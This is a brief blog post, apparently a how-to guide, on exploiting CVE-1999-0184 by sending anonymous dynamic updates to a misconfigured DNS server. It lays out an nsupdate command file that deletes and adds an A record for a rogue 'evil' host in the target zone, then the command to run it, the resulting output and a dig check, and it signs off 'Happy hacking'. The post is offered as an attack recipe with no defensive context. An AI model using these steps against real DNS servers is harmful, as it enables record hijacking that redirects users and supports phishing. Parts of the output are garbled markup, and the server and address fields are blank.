Exploiting CVE-1999-0184 DNS Poisoning

Yes this CVE is old, but I keep seeing it and there is no real tool or exploit guides available so I thought I would make one up right quick.

This “guide” is for Kali 2 and the basics of whats going on is the target DNS server allows anonymous DNS updates. The one tool we will need is nsupdate. If its not already on your system you can just run apt.


apt-get install dnsutilsNow we will need to start with a file that has all our commands in it. It should look something like this:


server #our target DNS server
zone corp.company.com #the zone we are working in.
update delete evil.corp.company.com. A #rm just in case.
update add evil.corp.company.com. 86400 IN A
Save the file as dns. Now just run the following command:


nsupdate -v dns
nsupdate should read all the commands in the dns file and send them to our target DNS server. After a few seconds you should see something similar to this:
Outgoing update query:


;; ->>HEADER<<- i="" id:="" nbsp="" noerror="" opcode:="" status:="" update="">
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;corp.company.com.  IN SOA

evil.corp.company.com. 0 ANY A
evil.corp.company.com. 86400 IN A
Now just run a quick DiG query to make sure it worked.


dig @ A evil.corp.company.com That is all I have for this post. Happy hacking

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button